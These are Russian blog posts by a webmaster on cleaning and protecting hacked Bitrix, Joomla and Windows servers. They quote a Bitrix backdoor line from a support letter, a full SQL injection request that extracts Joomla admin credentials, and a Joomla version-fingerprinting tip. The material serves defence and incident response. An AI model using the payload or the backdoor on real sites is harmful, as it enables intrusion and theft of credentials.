Волею судеб предоставляю я виртуальных хостинг для базе Windows 2008 Server R2 — как решение с удалённым сервером одним моим знакомым — собственно, его и приходится админить.
Сегодня приходит мессага с дата центра — канал с серваком забивает 100 мегабитный канал по самые уши — разбирайтесь!
На самом деле хвалиться не чем, т.к. такой херни вообще по идее быть не должно, но факт остаётся фактом.

Честно говоря в плане администрирования Винды открытой жопой торчащей в интернет я вообще слаб, даже не знаю нормальных антивирусов с хорошим настраиваемым фаерволом для Виндовс серверов 🙁
Ладно, к сути — канал забит, чего делать ?!
Стоит антивирь 360 Total Security халявная версия, который в плане сетевой защиты оказался полным нулём. Встроенный брандмауер тоже оказался бессильным.
Очень сильно выручил встроенный монитор ресурсов
Запускается так
perfmon /res
С помощью которого я определил, что исходящий трафик генерит lsass.exe с локального порта 389
Сделал блокирующее правило, ребутнул сервак и тьфу тьфу — вроде тишина пока.
Далее ставим все обновления (почему то служба была выключена), и на ночь запущу проверку cureit — может чего найдёт.

Всем привет!

Уже на третьем сайте под управлением CMS Битрикс (разные лицензии) обнаруживаю одни и те-же бэкдоры и трояны, причём непосредственно в файлах движка Битрикса!
Инструмент монитор качества «Ядро проекта не модифицировалось» такие файлы не ловит т.к. это не модифицированные, а просто левые файлы.
Но вот почему модификацию /bitrix/modules/main/include.php не находит — уже вопрос
Вообще файлик этот довольно мутный — в нём присутствует обфуцированный код, причём легальный — от конторы 1С Битрикс. (что и раздражает — вирусу легко можно спрятаться под этот код)

На крайнем проекте уже не выдержал и написал в саппорт вопрос о технологии поиска лишних файлов, на что получил не совсем то, что хотел, но думаю для поиска таких типичных вирусов это неплохая инструкция (вообще думаю в движке была дырка, которая не афишируется, через которую и произошла иньекция — т.к. сайты абсолютно разные, а вирусятина одна и та же!)

ЦИТАТА
Добрый день!

Да, это вирус.

Вам необходимо:
1. Сделать полную резервную копию сайта.
2. Удалить restore.php из корня сайта.
3. Удалить посторонний скрипт /bitrix/js/main/core/core_loader.js
4. Отредактировать /bitrix/modules/main/include.php, удалив из него строчки:

require_once($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/gadgets/bitrix/weather/lang/ru/exec/include.php");

if($_REQUEST["key"]!=""){if($_REQUEST["key"]=="a".md5("B_PROLOG_INCLUDED")."e"){$resu1t=copy($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/admin/restore.php",$_SERVER["DOCUMENT_ROOT"]."/restore.php");if($resu1t){die("ok");}else{die("fail");}}};


5. Удалить /bitrix/gadgets/bitrix/weather/lang/ru/exec/include.php и /bitrix/tools/check_files.php

если открывается http:// сайт /?utm_term=version — ваш сайт взломан с полным управлением у злоумышленника!
если открывается http:// сайт /bitrix/js/main/core/core_loader.js — ваш сайт взломан с полным управлением у злоумышленника!
если в корне лежит restore.php (а его там раньше не было) — тоже самое!

Заражение в действии — злоумышленник получает полный файловый доступ к сайту!

Вот такая приколюха!

Говорят «лучшее — враг хорошего», и в этом есть смысл.

Под впечатлениями от скрипта в предыдущей статье, решил поставить «следилку» на сайты нескольким своим клиентам, и чуток разочаровался — скрипт у одного не запустился т.к. версия PHP была мягко говоря устаревшей, на мои призывы обновиться сказал «работает — не трогай» (и в этом тоже есть своя правда), у другого довольно сильно подвесил систему т.к. файловая структура составляла сотни! тысяч файлов, а режима «быстрой» проверки (только по атрибутам файла — размер, даты, режим доступа, владельцы) отсутствовал.

Собственно, пришлось сделать простенький скриптик, практически моментально сравнивающий изменения из файлов, содержащих информацию о файловой структуре сайта.
Снимать дампы можно консольно (мне так удобнее), желающие могут дописать скрипт.
Скрипт «голый» — без интерфейса, отправки на мыло изменений и других наворотов — как есть.
Пользоваться так:
ls -alR > file1.txt
ls -alR > file2.txt
fdiff.php file1.txt file2.txt > diff.txt
скрипт кидает результат в поток, в моём случае перенаправленный в diff.txt

Кого заинтересовало — качаем.

Просто скопирую сюда письмо, которое отправил создателям данного очень полезного скрипта!

Приветствую коллеги!

Недавно наткнулся на ваше творение Скрипт проверки изменений на сайте — Анти Шелл — сам уже подобный скрипт писал под свои нужны много лет назад — а тут всё красиво — ООП, гит + интерфейс + основной функционал по созданию снимка и отправка на мыло изменений = молодцы!
Хотел своё творение облагородить, но всё руки не доходили …

Отписал на блоге позитив 🙂

Единственно — думаю есть смысл добавить FAST режим (без проверки по содержимому файла — только по атрибутам (размер + дата модификации).

А то на больших проектах не работает по памяти (пока явно не пропишешь поболе) и работает долго, нагружая всю систему.

Думаю врят ли будут внедрять даже мини-шелл контролируя изменение размера в файле (хотя конечно есть такая вероятность — для этого можно, например, всю неделю FAST режимом, в выходной один проход полный).

—
С наилучшими пожеланиями,
Алексей
gtalex.ru

GitHub

Скачать v.1.2.2

На всякий случай Зеркало версии 1.2.2

Время от времени, а точнее когда в очередной раз натыкаюсь на ломаные сайты, публикую подобные посты а ля «вылечу Ваш сайт», проведу аудит безопасности и самое главное — установлю систему контроля на взлом Вашего сайта!
Вот и сейчас пример поломанных 4х сайтов с файловыми и php иньекциями, тематика фармацевтика — т.к. её часто смотрю:
Сайт www.mgrad-putilkovo.ru — инъекция Где можно купить дженерик сиалис
Сайт www.catalog-max.ru — инъекция Где можно купить таблетки виагра
Сайт pearl-zelenograd.ru — инъекция Не дорого преобрести левитра — взломщик видимо не особо грамотный попался 🙂
Сайт za-vidnoe.ru — инъекция Женская виагра купить в аптеке Москва

Как видно хакеры уже ломают с умом и с конкретной целью — монетизировать взломанный ресурс, путём продажи через партнерку фарма препаратов (если конечно дорвей долго проживёт и поймает поисковый трафик — проиндексируется и «повисит» в выдаче Яндекса некоторое время на хороших позициях).
Так же видим, что по сути прямого вреда сайту данная иньекция не наносит — информация на сайте остаётся нетронутой, но всё же я думаю вред всё таки есть — страницы генерируются доргеном, текст на таких страничках создаётся роботизированный — не имеющий смысла, подобные страницы как правило не нравятся поисковикам — и на сайт накладываются штрафные санкции понижающие его в поисковой выдаче — что может быть хуже ? (конечно кроме порчи информации)
Так что, если Ваш сайт резко начал снижаться в позициях в ТОПах — проверьте его на зараженность, если сами не умеете — обратитесь к профессионалам или например я мог бы глянуть (гораздо дешевле чем у профи).

P.S.
К сожалению на мои посты и письма никто внимание не обращает — видимо люди заводят сайты просто так, и им плевать что с ними дальше будет.

Анализ поисковой выдачи конкурентных запросов — неиссякаемый источник информации к размышлению для оптимизатора!
Собственно, даже толком не понимаю зачем этот пост пишу — просто бесит блин когда в выдачу лезут подобными методами (я ведь не хакер, был бы хакером наверное не бесило бы).
Итак, ближе к телу — мониторил региональную выдачу «купить сиалис в Томске» и обалдел от количества лома в выдаче, причем на довольно ТОПовых позициях! что ещё больше раздражает!

То ли хакеры взялись за фарму, то ли вебмастера у хакеров лом скупают — не понятно.
Лом брать рискованно — во первых незаконно, теоретически могут и «подтянуть», а во вторых — недолговечно — как только хозяин узнает, сразу прибъёт — деньги улетят на ветер, но идея заманчива 🙂
Ломать самому — ещё более рискованно, и трудно досягаемо — пока этому научишься пройдёт время, Яша уже может научиться бороться за чистоту выдачи — всё время выкинуто на ветер.
А ничего не делать — вообще бесит! 🙁

Ещё скриншотик с выдачи:
Читать полностью »

Итак, имея инструмент блокировки по black-list и вручную ковыряя логи, обнаружил что практически DDOS устраивают куча всяких «левых» ботов.
Например «SemrushBot www.semrush.com/bot.html» — какой то иностранный SEO инструмент — думаю мой сайт ему вообще не пригодится, собирает всё на автомате создавая лишнюю нагрузку.
«megaindex.com» туда же — я на мегаиндексе ни ссылки ни статьи не закупаю, и не продаю.
«libcurl» — кто, то парсит curl-ом — тоже в сад
Анализ своих логов может проявить ещё много ненужных вам ботов.
Блокировать можно в 2 уровня — дописать в анализаторо логов по вхождению в user-agent, а так же непосредственно в nginx в начало секции server { … } добавляем:
if ($http_user_agent ~ SputnikBot|Crowsnest|PaperLiBot|peerindex|ia_archiver|Slurp|Aport|NING|JS-Kit|rogerbot|BLEXBot|MJ12bot|Twiceler|Baiduspider|Java|CommentReader|Yeti|discobot|BTWebClient|Tagoobot|Ezooms|igdeSpyder|AhrefsBot|Teleport|Offline|DISCo|netvampire|Copier|HTTrack|WebCopier) {
return 403;
}
Список проверяем вручную!
Как видно в списке присутствуют программы качающие сайт целеком — они так же создают сильную нагрузку! Вот ещё Список ботов и программ качающих сайт целиком.

В посте Защита от DDOS — первые шаги я закончил фразой «Теперь вот жду второго пришествия» — собственно, второе пришествие недавно заглянуло в виде очень дохленького DDOSa который все же забил канал так, что провайдерам пришлось отрубили порт.
Кэширование nging вообще тут не участвовало т.к. ддосили POST запросами.
Ограничение зоны на количество запросов с одного IP NGINX — защита от DDOS с одного IP. Параметры limit_zone и limit_req тоже не спасли!

Принял решение — полностью задействовать фаервол в связке с nginx, в моём случае фаервол ipfw т.к. операционная система FreeBSD, но это не суть, т.к. смысл остаётся тем же:
Анализируем логи, вычисляем злодеев, загоняем IP злодеев в blacklist который кушает фаервол.
Читать полностью »

Собственно перед взламыванием сайта зачастую собирают информацию о платформе и её версии.
Если это джумла — добавляем к имени домена /language/en-GB/en-GB.xml и вуаля!

P.S.
Запись для себя, чтоб не забыть 🙂

Собственно, может кому интересно будет — небольшой пример из текущего (буду краток).
Гемор: джумла, за безопасностью которой особо никто не следит, потому что джумла!
По знакомству данный гемор лежит на моём серваке, где у меня ночью отрабатывает самописный скриптик по отлову изменений в скриптах, и информирует меня в случае оных.
Вот и проинформировал меня вчера о появлении нового скрипта » /images/stat.php < 92427 " Излюбленное место хранения бэкдоров и наиболее популярное для бэкдора название 🙂 Смотрим файло глазами:

видим обфусицированный код (если есть желание посмотреть исходный код — пробуем) исходник бэкдора
запускаем — форма пост запроса (вероятно пароль к бэкдору)



search

Зараза 100% — убиваем её!
Осталось одно НО! — если зараза проникла единожды, проникнет и вторично!
Первое, что делаем — меняем все пароли доступа (т.к. скорее всего они уже у хакера в базе).
Второе, нужно анализировать логи веб-сервера и искать непосредственно дыру: как именно был внедрён бэкдор?
Дату создания и модификацию файла бэкдора подменили (бывает и не меняют — искать в логах гораздо проще).
Далее недолгий анализ, насторожил меня GET запросами вида

"/?option=com_contenthistory&view=history&list[ordering]=&item_id=&type_id=&list[select]=polygon%28%28/*!00000select*/*/*!00000from*/%28/*!00000select*/*/*!00000from*/%28/*!00000select*/concat_ws%280x7e3a,%28/*!00000select*/concat_ws%280x7e3a,0x534b4f54494e4b494e,username,password,0x505343%29/*!00000from*/fot6h_users%20where%20id%20=%20710%29%29as%20mk%29%60%60%29%60%60%29%29"

С какого это перепугу, в запросе иньекции SQL кода ?! явно используя дыру хотят чего то из базы поиметь — админские пароли, куки и т.д. и т.п.
Далее гуглим про дыры в «com_contenthistory» и сразу всё становится на свои места 🙂
Искать заплатки по данной дыре — дело хозяина джумлы, я же на скорую руку просто затыкаю любые запросы с вхождением com_contenthistory в параметры через .htaccess

RewriteCond %{QUERY_STRING} com_contenthistory
RewriteRule .* - [F]